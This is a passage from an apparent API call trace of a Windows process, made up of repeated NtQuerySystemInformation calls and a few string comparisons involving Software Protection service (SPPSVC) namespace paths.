SystemInformation=0xc751dfd060, Length=0x28, ResultLength=0x0) [0206.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x20, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf40, Length=0x20, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd140, Length=0x38, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfc0, Length=0x20, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0206.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd350, Length=0x28, ResultLength=0x0) [0206.311] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0206.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0206.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0206.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0206.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0206.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0206.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x28, ResultLength=0x0) [0206.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0206.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0206.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0206.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x20, ResultLength=0x0) [0206.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0206.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0206.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd040, Length=0x20, ResultLength=0x0) [0206.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0206.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0206.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0206.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0206.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0206.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd500, Length=0x40, ResultLength=0x0) [0206.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd460, Length=0x40, ResultLength=0x0) [0206.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd460, Length=0x40, ResultLength=0x0) [0206.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x30, ResultLength=0x0) [0206.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x30, ResultLength=0x0) [0206.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd288, Length=0x30, ResultLength=0x0) [0206.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x38, ResultLength=0x0) [0206.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0206.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0206.329] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0206.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0206.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0206.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0206.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0206.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0206.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x28, ResultLength=0x0) [0206.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0206.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0206.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x20, ResultLength=0x0) [0206.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd0, Length=0x20, ResultLength=0x0) [0206.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd0, Length=0x20, ResultLength=0x0) [0206.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd0, Length=0x20, ResultLength=0x0) [0206.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd460, Length=0x40, ResultLength=0x0) [0206.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd460, Length=0x40, ResultLength=0x0) [0206.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd460, Length=0x40, ResultLength=0x0) [0206.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x30, ResultLength=0x0) [0206.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x30, ResultLength=0x0) [0206.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd288, Length=0x30, ResultLength=0x0) [0206.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x38, ResultLength=0x0) [0206.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0206.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0206.343] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0206.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0206.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0206.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0206.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0206.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0206.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0206.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x28, ResultLength=0x0) [0206.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0206.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, 